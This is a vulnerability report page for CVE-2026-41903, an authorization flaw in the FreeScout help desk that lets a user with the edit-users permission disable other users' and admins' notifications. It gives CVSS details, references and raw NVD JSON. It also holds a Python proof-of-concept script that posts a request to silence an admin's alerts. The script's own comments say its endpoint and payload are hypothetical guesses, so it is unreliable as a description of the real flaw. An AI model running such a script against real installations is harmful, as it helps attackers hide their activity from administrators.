Security Vulnerability Report
CVE-2026-41903 CVSS 5.4 MEDIUM

CVE-2026-41903

Published: 2026-05-07 19:16:01
Last Modified: 2026-05-07 19:51:36

Description

FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user holding the PERM_EDIT_USERS permission (intended for general user-profile editing) can read and modify the notification subscriptions of any other user, including admins, by sending a single POST request. This is a sibling of CVE-2025-48472's notification authorization bypass; the prior fix did not cover this code path. A non-admin attacker can silently disable an admin's email/browser/mobile notifications, suppressing security alerts and conversation-assignment notices. This issue has been patched in version 1.8.217.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

No configuration data available.

FreeScout < 1.8.217

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-41903
# Description: Exploit script to disable notifications for an admin user
# Requirement: Valid session cookie for a user with PERM_EDIT_USERS permission
#
# Note: the endpoint path and payload structure below are hypothetical; they were
# derived from the advisory description, not from FreeScout's actual routes.
import requests


def exploit(target_url, admin_user_id, session_cookie):
    """Send a malicious POST request to disable admin notifications."""
    headers = {
        "Cookie": session_cookie,
        "Content-Type": "application/json",
        "User-Agent": "Mozilla/5.0",
    }
    # Payload to disable email and browser notifications
    # The exact JSON structure depends on the FreeScout API implementation
    payload = {
        "subscriptions": {
            "email_new_reply": False,
            "browser_new_reply": False,
        }
    }
    # Endpoint to update user notifications (hypothetical based on description)
    url = f"{target_url.rstrip('/')}/api/v1/users/{admin_user_id}/notifications"
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Success: Admin notifications have been disabled.")
        else:
            print(f"[-] Failed: Server returned status code {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {str(e)}")


if __name__ == "__main__":
    # Example usage
    TARGET = "http://example-freescout.com"
    ADMIN_ID = "1"
    COOKIE = "freescout_session=attacker_session_token_here"
    exploit(TARGET, ADMIN_ID, COOKIE)
```

References

https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217
https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-f489-qxv6-gvgg

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41903",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T19:16:00.950",
    "lastModified": "2026-05-07T19:51:36.220",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user holding the PERM_EDIT_USERS permission (intended for general user-profile editing) can read and modify the notification subscriptions of any other user, including admins, by sending a single POST request. This is a sibling of CVE-2025-48472's notification authorization bypass — the prior fix did not cover this code path. A non-admin attacker can silently disable an admin's email/browser/mobile notifications, suppressing security alerts and conversation-assignment notices. This issue has been patched in version 1.8.217."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-f489-qxv6-gvgg",
        "source": "[email protected]"
      }
    ]
  }
}
```